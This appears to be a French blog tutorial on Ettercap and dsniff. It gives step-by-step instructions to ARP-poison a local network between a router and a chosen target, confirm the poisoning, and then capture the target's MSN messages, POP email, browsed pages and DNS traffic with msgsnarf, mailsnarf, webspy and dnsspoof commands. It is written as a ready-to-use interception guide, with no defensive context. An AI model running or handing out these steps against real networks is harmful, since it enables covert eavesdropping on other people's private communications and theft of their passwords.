Ettercap + utilisation des outils

ettercap

Ettercap est un utilitaire réseau aux multiples fonctionnalités. A sa naissance, l’utilisation la plus courante qu’on en faisait, était de sniffer (capturer les paquets) des réseaux LAN. Dorénavant, il est également possible de réaliser des attaques de MITM ou d' »Homme au milieu » (attaque comme l’hijacking TCP, le DNS Spoofing…). Ettercap est doté de plug-in facilitant la recherche de password. Pour cela, il suffit simplement qu’une session d’un protocole non sécurisé ait lieu, pour qu’il détecte toutes les informations sensibles. De nombreux protocoles sont supportés (ftp, http, telnet,…). Depuis l’intégration de module gérant le ssh, et les sessions html sécurisés (ssl), il est également possible de récupérer les mots de passe à travers un MITM. Il est composé également de fonctions intéressantes sur le réseau comme l’injection de requêtes, soit à envoyer au client (pour par exemple garder une connection active), soit à envoyer au server (pour en tirer parti). On peut également réaliser des analyses d’hosts intéressantes et des identification sur les machines (informations sur le système…etc) C’est un projet libre, qui peut être utilisé au travers d’un mode graphique, et d’un mode texte simple, ou interactive avec des menus.

Installation de Ettercap et des outils:

Installer Ettercap et ses outils via Synaptic ou par le terminal.

# apt-get install ettercap-gtk dsniff

Intercepter des informations circulant sur le réseaux local :

Lancer ettercap-gtk (l’utilisation du superutilisateur est requis).

Puis faire MAJ+U pour selectionner l’interface à scanner.

Puis faire CTRL+S pour scanner toutes les IP et enfin « H » pour afficher les IP trouvé.

Mettre en « Target 1 » IP du routeur et en « Target 2 » IP de la cible, puis faire « T » pour vérifier que les Target sont correct.

Lancer  le sniffing avec CTRL+W, puis activer le poison dans le menu « Mitm > Apr poisoning » et cocher « Sniff remote connections ». Vérifier que le poison est actif, faire CTRL+P et lancer « chk_poison ».

Ce qui devrais retourner dans la boite de dialogue ceci:

Activating chk_poison plugin… chk_poison:

Checking poisoning status…

chk_poison: Poisoning process succesful!

Le poison est alors actif et opérationnel.

Utilisation des outils Dsniff :

Intercepter les messages transmis sur MSN avec msgsnarf !

# msgsnarf -i $interface (remplacer $interface votre interface eth0,ath0 etc…)

Intercepter les emails passant par le service POP !

# mailsnarf -i $interface (idem)

Intercepter les pages web afficher chez la cible !

# webpsy -i $interface $ip (idem + remplacer $ip par IP de la cible)

Intercepter les requetes DNS et les rediriger !

# dnsspoof -i $interface -f /etc/host dst $ip (idem)

La liste des outils est longue et la faq est dispo en Français est dispo ICI

Voici une video représentant ce tuto:

[pro-player width=’320′ height=’240′ type=’FLV’]http://djmaster.fr/wp-content/uploads/2009/03/ettercap_utilisation.flv[/pro-player]

2 Comments

Add a Comment

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

2009-2015(c)Djmaster13--Pinux13